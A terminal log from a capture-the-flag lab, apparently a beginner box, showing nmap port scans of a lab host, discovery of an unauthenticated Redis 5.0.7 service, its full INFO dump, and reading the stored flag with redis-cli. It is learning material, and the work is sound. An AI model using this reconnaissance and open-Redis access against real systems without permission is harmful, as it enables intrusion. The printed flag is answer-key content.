    ~/CTF/Boxes/Dancing-Box    main ?1  sudo nmap -sS 10.129.225.125                                                                                                                 ✔  16s   13:50:43  
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 13:51 CET
Nmap scan report for 10.129.225.125
Host is up (0.025s latency).
All 1000 scanned ports on 10.129.225.125 are in ignored states.
Not shown: 1000 closed tcp ports (reset)

Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
    ~/CTF/Boxes/Dancing-Box    main ?1  sudo nmap -p 1-65535 10.129.225.125                                                                                                                  ✔  13:51:12  
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 13:51 CET
Nmap scan report for 10.129.225.125
Host is up (0.026s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE
6379/tcp open  redis

Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds

    ~/CTF/Boxes/Dancing-Box    main ?1  sudo nmap -sV -p 6379 10.129.225.125                                                                                                         ✔  15s   13:51:34  
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 13:52 CET
Nmap scan report for 10.129.225.125
Host is up (0.025s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.7

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.43 seconds

    ~/CTF/Boxes/Dancing-Box    main ?1  nmap --script redis-info -sV -p 6379 10.129.225.125                                                                                           ✔  6s   13:52:18  
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 13:54 CET
Nmap scan report for 10.129.225.125
Host is up (0.025s latency).

PORT     STATE SERVICE VERSION
6379/tcp open  redis   Redis key-value store 5.0.7 (64 bits)
| redis-info: 
|   Version: 5.0.7
|   Operating System: Linux 5.4.0-77-generic x86_64
|   Architecture: 64 bits
|   Process ID: 748
|   Used CPU (sys): 0.503938
|   Used CPU (user): 0.491900
|   Connected clients: 1
|   Connected slaves: 0
|   Used memory: 839.48K
|   Role: master
|   Bind addresses: 
|     0.0.0.0
|     ::1
|   Client connections: 
|_    10.10.15.8

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds


    ~/CTF/Boxes/Redeemer    main ?1  nc -vn 10.129.225.125  6379                                                                                                                         INT ✘  14:01:30  
10.129.225.125 6379 (redis) open
info
$3292
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-77-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.3.0
process_id:748
run_id:88265c6e03240676db9b87770af6f7207a840306
tcp_port:6379
uptime_in_seconds:930
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:10337720
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf

# Clients
connected_clients:1
client_recent_max_input_buffer:4
client_recent_max_output_buffer:0
blocked_clients:0

# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:5238784
used_memory_rss_human:5.00M
used_memory_peak:859624
used_memory_peak_human:839.48K
used_memory_peak_perc:100.00%
used_memory_overhead:846142
used_memory_startup:796224
used_memory_dataset:13482
used_memory_dataset_perc:21.26%
allocator_allocated:1221400
allocator_active:1482752
allocator_resident:4243456
total_system_memory:2084024320
total_system_memory_human:1.94G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.21
allocator_frag_bytes:261352
allocator_rss_ratio:2.86
allocator_rss_bytes:2760704
rss_overhead_ratio:1.23
rss_overhead_bytes:995328
mem_fragmentation_ratio:6.41
mem_fragmentation_bytes:4421176
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0

# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1671282075
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:409600
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0

# Stats
total_connections_received:11
total_commands_processed:11
instantaneous_ops_per_sec:0
total_net_input_bytes:415
total_net_output_bytes:10139
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:567
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0

# Replication
role:master
connected_slaves:0
master_replid:dfdec6dc6daf3bf630ddbf445507bf3162fcddf0
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0

# CPU
used_cpu_sys:0.904935
used_cpu_user:1.029072
used_cpu_sys_children:0.001623
used_cpu_user_children:0.001623

# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0

   /opt/HackingTools  redis-cli -h 10.129.225.125                                                                                                                                   ✔  3m 36s   14:14:24  
10.129.225.125:6379> INFO keyspace
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
10.129.225.125:6379> SELECT 0
OK
10.129.225.125:6379> KEYS *
1) "numb"
2) "flag"
3) "stor"
4) "temp"
10.129.225.125:6379> get flag
"03e1d2b376c37ab3f5319922053953eb"
10.129.225.125:6379> 
